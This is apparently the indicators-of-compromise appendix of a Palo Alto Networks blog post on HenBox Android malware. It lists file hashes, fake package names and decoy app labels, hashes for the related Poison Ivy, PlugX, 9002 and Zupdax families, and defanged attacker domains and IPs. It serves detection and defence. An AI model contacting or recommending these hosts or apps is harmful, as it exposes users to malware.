ad5a6b9ca0389c458dde73a456404634eec473cf5833914c7466af41e23b6ea9 cn.android.setting 设置 Setup
a5d9efae12c9e5913156b5415581678748bdeed25a5767438afadc869d25e0d4 cn.android.setting 设置 Setup
b5598c4a26f3b4a143a413c46935f0506afd7e400ecf4c6ca05595e83d8dc2c7 cn.android.setting 设置 Setup
4f6173659e2c23835228f2e05daacecb618c099878d0028dd9a52b9682de2ac4 cn.android.setting 无秘 No secret
7d8a47cda9367ee31ebf58dd226afc583b34a73476ed5ff1b2b3f2460cd4c339 cn.android.setting uyhl uyhl
b34b09d7b4bee3125ea9b27c128c4239c78d3be95d9d5dff73c68e479353db5b cn.android.setting 设置 Setup
b3413e09ceecc305187d08007ea86f654a451952807e37b8f2dcd14a8127042a cn.android.setting 设置 Setup
718bab91ba29791a494c31783b64ce1fe3d78bcdd6a6f909588e198fbea3b3cf cn.android.setting 设置 Setup
de9d1c68ef9df6dd72455f50d1cdffd76e24a501bbbaa3cacc4aedb74b2f743d cn.android.setting 探探 Explore
55e65d1fba82a21b0ee52435be890279cf7ae747abba7f448a6547ba2ed9666e cn.android.setting 设置 Setup
801d54f829668487c2ed28dc56beb6f156a6100a3be12805e1104fb9f68f6a00 cn.android.setting 设置 Setup
3ffa8ef36934420b08e4139385400da774f61cabe000557ff025af650f2964bb cn.android.setting 设置 Setup
8b4e60160089b6af71e3c555c4bdaa9344b76a5f0dfd1ecc3a6e8c23f0940b2a cn.android.setting 0
b779a7a05c226a14c2f4bad1f22c493a2a9de8b988b01602fbe60d1f6dc2ba8c cn.android.setting 0
4a8c5194183f2a5b593654a29213c6f705f083ddbbff10a0bb1e7695c66a0f89 cn.android.setting 0
775c2dbf6dd7423bd098b216bd6dcf11104e885e451fa95ae64dc18fb54a34c7 cn.android.setting 0
228d1c80a92641c6ba9c9d1e68146e9bb66f02605135c2603db3ace692cc05f2 cn.android.setting 0
4ecf03a1eaa0255340a41e48728be1d50dab724b72f9096a1f537fa578e76d17 cn.android.setting 0
8a28fed36cf0d8640c7086770614e33d3788200bc7b0b408873873cd17e31653 com.android.henbox 0
35b1f11a97dd5c05c87328e2ed4ae5776b84d3ce6cf4cdbc2faa1865dab2e09b cn.android.setting 0
bb91d7bbea783bacd57a92691ebcbb449d9606f2f3bbb77538ec751a8b01d8a9 com.android.henbox 0
011509bb9cde31c0b45c49747ff150abcfa66d283ff986f167bf564bacfded4d com.android.henbox 0
da6d75e996b0bafad782d87c809269ef5ccfa62c938039790333f0f2b4ecafe3 cn.android.setting 0
eb31fc24f727bc6f25b7a90dc86c127099384398b7182ae52d3fe23950e9ed8c com.android.henbox 0
6d441e6b75fa0ea1880937d7c94dbd1caaa210915d386dfb5a01ca22fd813d28 com.android.henbox 0
c153ed3b2ae96cb2ec55294f89180302f89e9dbca6a192eec7bd4f3591b8252e cn.android.seting 0
2510aa8736c5462e8784f1cf494716bb923f97645899c73c56ead1ff58b35499 cn.android.setting 0
0bfbbca56718b5bae7e21613a9884ea80db53aa1eca9cacf5a793e52f6a724e7 com.android.henbox 0
e9da842ccf4a681226577c26e2becea079080a4b6838171c06bb358db132bc5e cn.android.setting 0
20fcff9826373d50abe813d3cb0272bf7b65617196cd4ac8d4646b8fd3256bea cn.android.setting 0
0387baebb2b0c678e46e7291325e91118c53a3206d73c1145c082b10cf6a65f1 cn.android.setting 0
0efaf91842a7e45562e97bda369efa6e14f98bf9d63782ec9c323fa246da549a cn.android.setting 0
cdbd4b98625c4766cbf72f69ce951faf49a13394ea85e7a23188e70a209609be cn.android.seting 0
d4ef4bdea69a248f9792211c4d52882ad6262f7223fc1aa9f328abe50412669f cn.android.setting 0
3db36dc3b21dbd0a9037cda21606d37c1a1dd493346e00e36231a252a14446d6 cn.android.setting 0
92c5fdf61b378e5252b0eb70a5cfd7af2d27c915aece48e32b9c2ba04a5fa5b3 cn.android.setting 0
740a54e1f89cb321d13396987fd26d52c6c66c49894283c6d9889156e063ecb3 com.android.henbox 0
7f76f102ab233528ce3cb111ae3b026cf16b3233c6bf3002de8a0daea3ebc0d7 com.android.henbox 0
153794e424eceaba48e28e7f3333ab0c9c7addeda1c5de7835b191f5f25e4e34 com.android.henbox 备份 Backup
a1bf2f3fcac9d1aae94eb7a6dc37be00185e102e504032f4ffa391ddbd4bd353 com.android.henbox 0
444e73bd1020d08dc2901a041d675db1060815914024855daeddbc201e3ad4ee com.android.henbox 0
f88c84156d8e9fdec6f5c400135277ecd03e4b1d95e7d3b6f5b8c8a77eeb055f cn.android.setting 0
2782265ddd3a0d94d4f2622366b3401002dcfe1a9b99b7cbf6d5e824ff14d728 com.android.henbox 0
efff4243b6143c937509f52dbe7c4e40ceb2eb226f7cc1c96d8cf9f287668e37 cn.android.setting 设置 Setup
000473f7168ebda3de054a126352af81b61dd0be462ae9b3c7ccc0bc5cea7986 cn.android.setting 0
6f0de72ee2df4206102c1ff93955fef07cee84a1ba280ef3eda3db9a7eafb22e cn.android.setting 0
2f7aa05b16d870d34feb1faa62bbfb9c5cffd4a52ea094c66657887b7c7046d4 cn.android.setting 0
198ff17259ad377fae62ca49daaed0d9313831d5a12b16a79dd54045eb6909b8 cn.android.setting 0
88c08e7084d4e0db14fc5fec6c906ff89e68b54df09096d49573b1906dd1ecd2 cn.android.setting 0
5fff623781636b2af95327293f246e0d83b90012f067a8c9e6c2b5869e606465 cn.android.setting 0
a26802ebe8ad4dc076becbc18b32a825cf057ff2059a0742ece86afe6fcb496c com.android.henbox 0
e0427ca401d68c347ef14f65a94735f76238f59710d99c4097e51da23cbb2a6d cn.android.setting 0
cf36fb6f2d4029876f50d6a1eb9eafb13eb0bc6a57e179172ffe67a305f33c41 cn.android.setting 0
d68070f75341ce070b11a4ecda28d80a85303fa102fb4cb84c3dcbf97863bcc5 cn.android.setting 0
60adc526a1bfa8df150c25016d220544671a62820493b66a8467436181b8d224 cn.android.setting 0
0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 com.android.henbox DroidVPN DroidVPN
f28761f897e3a0e1dcdb0a993076a1cc48a1b17361d3f401aa917406332a79f1 0
fa5a76e86abb26e48af0b312f056d24000bc969835c40b3f98e5ca7e301b5bee com.android.henbox Uyghurche Kirguzguch Uyghurche Kirguzguch
5808df07cedf15451ab0984e9c60b077602de258319d48cf88b0cc4ca7bb57a0 0
b0e0d35649d6e5405d051580d0c2a7ca5d3eb58f38bd51d0b8b7b98813256ea1 0
2db13b0cdede04b1b050744114e6c849e5e527b37bcd22984b265dff874dd411 0
c6117397a54a1c2fda6efe40b1a209c14834f9ecb82136e06174c16644a59657 0
ed35dab84aa4de72e782aef8cead90688d5c664de878207488828ed16902e828 0
2a7ab147d9e7c7f5349f5f929a2f955fb03b376d29d02d5a41d5e6da31d7cdcf 0
f3d04a7f77498acec86efc8d372c4d6eac591d8030f0a867ab856074e4da1fe6 0

Poison Ivy

d3d5a43a2a4f054d41acf6d5f5c1d4d87c7027d880172c3167eaa19f99db43db

dfcff48fb7ad43940c46430a4cd28d52564ea9b6e40a23ff4324da919a5fb783

12759f7fd01ffdea97954be5404d7e43a3941a7388129e7b6ace85f56b500cd8

26c0349af2b5ffebd01d86eff16a0158bb3ceba9ecb04a0c0bd442bc5736328d

ac8fc264c7ec3cf70836e1bb21f9a20174b04ad49731b8797d7d8bb95cb353e2

3d714e1c02c4baf37008fb2537b02c0c1f524fa49263f3400f97f9ef12f2c907

58246d040c79c2a75729511f09b09ae709fbfbaa0bad6e72751a586f7b37ec5e

c9be192a5acfc3b416dbd3fa800fa63851b3440d4187961978b33cef21aeaaeb

98f16b65b8acd4610077edd92dcb090e3d97f427dbb621827096071ed333b7b4

7cdd37ef4a45afa1b85c87f2a778cf8a7482f7beeee5178856d2f4acfa841135

c9be192a5acfc3b416dbd3fa800fa63851b3440d4187961978b33cef21aeaaeb

14e2e6bbcc68650bfd7c1eb374401eb606c7417dfae7bebb4bf86909e2ff524d

6a5998faa2be7d8b44f23cd5e02c9e3fa4a22bdba32e4663780aa035bddef239

b45e4ac7a790a7c6364cd93e371e548756f621028380c850059954340c0f13dc

b82785a6d488798c43f9dba0dd3f6cf8a4b03b308203452f641456dde09bedd8 

PlugX

45c64508382f41056bed1a6d95927225791fe8fcd8ee9a9a133968b93c19e39f

9002

b2966c2702285d2cad851bae72fe22136d7975a2a50b43a855447703146c63f0

1b168603010e5179d001f78e47176296776938dde2351ca2250f2977eff043d0

C11b963e2df167766e32b14fb05fd71409092092db93b310a953e1d0e9ec9bc3

Zupdax

ce0a078d12698cfca9c4a00dcb6cb2425956538f271e6a151a0e646677ed4ae9

ffc3f886d142c5df35b8eb1c2aee77e553a74657b6054e596e8347b4f0c0975e

Domains and IPs

60.191.57[.]35

47.90.81[.]23

222.139.212[.]16

59.188.196[.]172

222.239.91[.]30

work.andphocen[.]com

andphocen[.]com

w3.ezua[.]com

lala513.gicp[.]net

logitechwkgame[.]com

www5.zyns[.]com

www3.mefound[.]com

w3.changeip[.]org

admin.nslookupdns[.]com

cdncool[.]com

dns.cdncool[.]com

tcpdo[.]net

3w.tcpdo[.]net

md5c[.]net

jackhex.md5c[.]net

up.outhmail[.]com

outhmail[.]com

queryurl[.]com

update.queryurl[.]com

re.queryurl[.]com

mail.queryurl[.]com

adminsysteminfo[.]com

info.adminsysteminfo[.]com

The post HenBox: The Chickens Come Home to Roost appeared first on Palo Alto Networks Blog.

Go to Source
Author: Alex Hinchliffe